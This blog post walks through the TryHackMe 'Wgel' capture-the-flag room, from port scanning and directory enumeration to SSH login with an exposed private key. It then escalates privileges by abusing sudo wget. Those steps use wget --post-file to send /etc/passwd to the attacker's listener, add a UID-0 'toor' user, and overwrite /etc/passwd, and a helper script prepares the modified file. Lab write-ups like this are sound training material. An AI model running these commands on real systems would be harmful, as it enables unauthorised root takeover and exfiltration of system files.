THM ROOM: Wgel CTF Walkthrough

0xViKi
Published in System Weakness
Oct 24, 2023

Welcome to the Wgel TryHackMe room! In this blog post, we’ll walk through the step-by-step process of gaining root access to the target machine. Let’s get started!

TryHackMe Challenge Link: https://tryhackme.com/room/wgelctf

Reconnaissance — Nmap Scan:

The first step in any hacking endeavor is reconnaissance. We ran an Nmap scan to identify open ports and services on the target machine. (-sS is a SYN scan and needs raw sockets, hence sudo; -A turns on OS detection, version detection, script scanning and traceroute, so -sV is redundant here but harmless.)

sudo nmap -sV -sS -A <IP>
[Screenshot: Nmap Scan]

Our scan revealed two open ports:

  • Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
  • Port 80 (HTTP) hosting an Apache web server on Ubuntu.

Directory Enumeration:

gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
[Screenshot: Initial Directory Enum]

Our initial scan led us to a directory named “/sitemap,” which immediately caught our attention. We proceeded to enumerate the contents of this directory with the same wordlist.

gobuster dir -u http://<IP>/sitemap/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20

Enumeration of /sitemap revealed a “.ssh” directory, and inside it a file named “id_rsa.” This is a significant find: a readable SSH private key exposed by the web server could give us a shell on the box.

[Screenshot: Directory Enum on /sitemap]
[Screenshot: SSH Directory]

The id_rsa file contains an SSH private key. It is not a password but the private half of a key pair: if the matching public key is listed in a user's ~/.ssh/authorized_keys on the target (and the key is not passphrase-protected), the key alone authenticates us as that user. We still needed the username. After some digging, I discovered something interesting in the source code of Apache’s default webpage.

[Screenshot: Possible Username]

Initial Foothold — SSH Access:

chmod 600 id_rsa    # ssh refuses a private key that is readable by others
ssh -i id_rsa jessie@<IP>

Our SSH connection was successful, granting us initial access to the system. However, the real challenge was yet to come.

Exploring further, we found the user flag.

[Screenshot: User Flag]

Privilege Escalation:

Now that we had access as the user “jessie,” our next goal was to escalate privileges to root.

I checked sudo -l and discovered that /usr/bin/wget can be run as root, making it a likely privilege escalation vector: wget running as root can both read arbitrary files (--post-file) and write arbitrary files (-O) with root's permissions. (GTFOBins lists the same primitives for wget.)

[Screenshot: sudo -l output]

There are various ways to escalate privileges through wget; here is the simplest. The idea is to use root's wget to read /etc/passwd off the box, add a UID-0 user to the copy, and use root's wget again to write the copy back.

Here are the steps I took to gain root access:

  • We used “sudo /usr/bin/wget” with --post-file to send the target's “/etc/passwd” to a listener on our own machine. (TUN0_IP = Kali_Linux_IP)
sudo /usr/bin/wget --post-file=/etc/passwd http://<YOUR_TUN0_IP>:5555
  • We listened for the incoming connection and captured the “/etc/passwd” file. The listener output begins with wget's HTTP request headers; keep only the lines after the blank line that separates the headers from the body.
nc -lvnp 5555
  • We appended a new user with UID 0 and GID 0 to the captured copy. The password hash goes in the second field, so login uses it directly and never consults /etc/shadow for this account. The default algorithm of “openssl passwd” varies with the OpenSSL version; “openssl passwd -6” produces a SHA-512 crypt hash that modern glibc accepts.
echo "toor:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> passwd
  • We hosted the modified “/etc/passwd” file on a local HTTP server (port 8000 by default).
python3 -m http.server
  • We used root's “wget” to overwrite /etc/passwd on the target with the hosted copy, effectively creating a new root-level user. Caution: -O truncates the destination before the download starts, so a failed transfer leaves the box with an empty /etc/passwd and nobody able to log in. Check that the file is being served correctly first, and verify the target's /etc/passwd is intact afterwards.
sudo /usr/bin/wget http://<YOUR_TUN0_IP>:8000/passwd -O /etc/passwd
  • Finally, we switched to the newly created user and gained root access to the system. username: toor, password: toor
su toor

# will ask for password
# Password is toor
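The passwd-editing step above is the one that can brick the target if the file is malformed, so here is an added example (not from the original write-up) that prepares the modified copy offline and sanity-checks it before it is pushed back with sudo wget -O. It assumes a POSIX shell with awk and mktemp; the hash is a constructed placeholder so the script runs without openssl, and the sample passwd content is constructed, standing in for the file captured over nc.

```shell
#!/bin/sh
# Added example (not from the original write-up): prepare and sanity-check the
# modified passwd file offline before pushing it back with "sudo wget -O".
# Assumes a POSIX shell with awk and mktemp; openssl is only needed to make a
# real hash.
set -eu

# Build a root-equivalent entry: UID 0, GID 0, home /root, shell /bin/bash.
# $2 is a crypt(3) hash; with a hash in the second field, login uses it
# directly and never consults /etc/shadow for that account.
root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Copy $1 to $2 and append the new entry, refusing if the username already
# exists (the first matching line wins, so a duplicate is unreliable).
add_root_user() {
    src=$1; dst=$2; user=$3; pwhash=$4
    if awk -F: -v u="$user" '$1 == u { found=1 } END { exit !found }' "$src"; then
        echo "refusing: user $user already present in $src" >&2
        return 1
    fi
    cp "$src" "$dst"
    root_entry "$user" "$pwhash" >> "$dst"
}

# Every line needs exactly 7 colon-separated fields and a numeric UID; a
# malformed passwd can lock every account out of the box, including yours.
validate_passwd() {
    awk -F: 'NF != 7 || $3 !~ /^[0-9]+$/ { bad=1 } END { exit bad+0 }' "$1"
}

# Number of UID-0 accounts; a clean box has exactly one.
count_uid0() {
    awk -F: '$3 == 0' "$1" | wc -l | tr -d ' '
}

# Constructed sample standing in for the /etc/passwd captured over nc
# (after stripping the HTTP request headers that wget --post-file sends first).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
EOF

# Placeholder hash (not a real password hash) so the demo runs without
# openssl; for real use generate one with:  openssl passwd -6 'toor'
DEMO_HASH='$6$demosalt$placeholderhash'

MODIFIED=$(mktemp)
add_root_user "$SAMPLE" "$MODIFIED" toor "$DEMO_HASH"
validate_passwd "$MODIFIED"
echo "passwd OK, UID-0 accounts: $(count_uid0 "$MODIFIED")"
```

Run it, then serve the resulting file with python3 -m http.server as in the write-up; the validation step is what stands between you and an empty or unparseable /etc/passwd on the target.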

[Video: Priv Escalation]

Retrieving Flags:

With root access secured, we were able to retrieve both the user and root flags.

  • The user flag was located in the “/home/jessie/Documents/user_flag.txt” file.
  • The root flag was stored in the “/root/root_flag.txt” file.
